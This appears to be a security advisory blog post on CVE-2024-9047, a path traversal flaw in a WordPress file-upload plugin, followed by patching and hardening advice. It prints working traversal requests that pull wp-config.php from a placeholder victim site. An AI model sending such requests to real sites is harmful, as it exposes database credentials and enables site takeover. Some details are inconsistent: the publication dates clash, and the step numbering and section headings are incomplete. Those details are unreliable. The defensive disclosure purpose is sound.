CVE-2024-9047 - Exploiting Path Traversal in WordPress File Upload Plugin (v4.24.11 and Below)

Published: June 2024
Vulnerability Type: Path Traversal
Component: WordPress File Upload Plugin
Versions Affected: All up to 4.24.11
Attack Vector: Remote, unauthenticated
PHP Versions Affected: Only PHP 7.4 and older
File: wfu_file_downloader.php

Overview

A new vulnerability, tracked as CVE-2024-9047, dramatically impacts websites running the popular WordPress File Upload plugin, v4.24.11 or prior. Through a flaw in how downloads are processed, attackers can gain unauthorized access, letting them read or delete files outside the intended directory.

Most alarmingly, attackers don’t need to be logged in. All they need is for the WordPress site to be using PHP 7.4 or earlier—a still-common setup.

What is Path Traversal?

Path Traversal (also called directory traversal) lets an attacker read or manipulate files outside their allowed folders. It works by injecting special patterns—like ../—into file paths, tricking software into reaching restricted files, such as configuration, credential, or system log files.

Vulnerability Details

The vulnerable script, wfu_file_downloader.php, is intended to handle file downloads securely. However, it fails to properly sanitize user input provided in download requests. If left unchecked, this gives attackers a way to request any file the web server user can access.

A critical note: This flaw is only exploitable on PHP 7.4 and earlier because of default settings for filter_var and weak path handling. PHP 8’s changes to path handling make this exact attack much harder, though not impossible if custom settings are used.

Technical Exploit Breakdown

Let’s break down how an attacker would exploit CVE-2024-9047.

2. Sending the malicious request

The file download feature is handled by sending a GET or POST request to wfu_file_downloader.php, with a critical parameter typically called filepath or similar.

A normal request could look like

/wp-content/plugins/wordpress-file-upload/lib/wfu_file_downloader.php?filepath=some_upload.pdf

An attacker would modify this to

/wp-content/plugins/wordpress-file-upload/lib/wfu_file_downloader.php?filepath=../../../../wp-config.php

The ../../ pattern climbs directories, letting the attacker reach intended files outside the normal upload directory. The wp-config.php file contains database credentials and secret keys—prime target for compromise.

Inside wfu_file_downloader.php (simplified)

$filepath = $_GET['filepath'];
$file = '/path/to/uploads/' . $filepath;

if (file_exists($file)) {
    // download or delete file
    readfile($file);
}

Read arbitrary files: Download wp-config.php, .htaccess, log files, etc.

- Delete arbitrary files: If delete logic is implemented, attacker may delete plugin, theme, or core files—bricking WordPress or deleting backups.

Exploit Example

Suppose a vulnerable website sits at https://victim-site.com, and WordPress is installed in the root directory.

Exploit request to steal database credentials

GET /wp-content/plugins/wordpress-file-upload/lib/wfu_file_downloader.php?filepath=../../../../wp-config.php HTTP/1.1
Host: victim-site.com

Response:
The contents of wp-config.php! The attacker can now access the WordPress database directly.

1. Upgrade the plugin immediately

The developer has patched this flaw as of v4.24.12 (changelog). Update now!

2. Upgrade PHP

PHP 7.4 is end-of-life, unsupported, and increasingly dangerous to run online. Upgrade to PHP 8+.

3. File Permissions

Always make sure upload directories and configuration files have correct file permissions, and that web server processes have minimal access.

4. Web Application Firewall (WAF)

Block requests with suspicious patterns like ../ or attempts to access sensitive plugin scripts directly.

References

- Official WordPress File Upload Plugin Page
- CVE-2024-9047 at NVD *(if available at time of reading)*
- Wordfence Threat Intelligence: CVE-2024-9047 Explained *(Search for “CVE-2024-9047”)*

Conclusion

CVE-2024-9047 shows how even basic file upload plugins can become a gateway to full site compromise through path traversal attacks. If you run a WordPress site, keep your plugins and PHP version up to date, and audit your sites for exposure. One outdated plugin could hand over your complete site—*and your users’ data*—to anyone on the internet.

Update now, and spread the word!

*Original research and exclusive writeup by AI Security Team, June 2024. Please cite this article when sharing exploit details.*

Timeline

Published on: 10/12/2024 07:15:02 UTC
Last modified on: 10/15/2024 12:57:46 UTC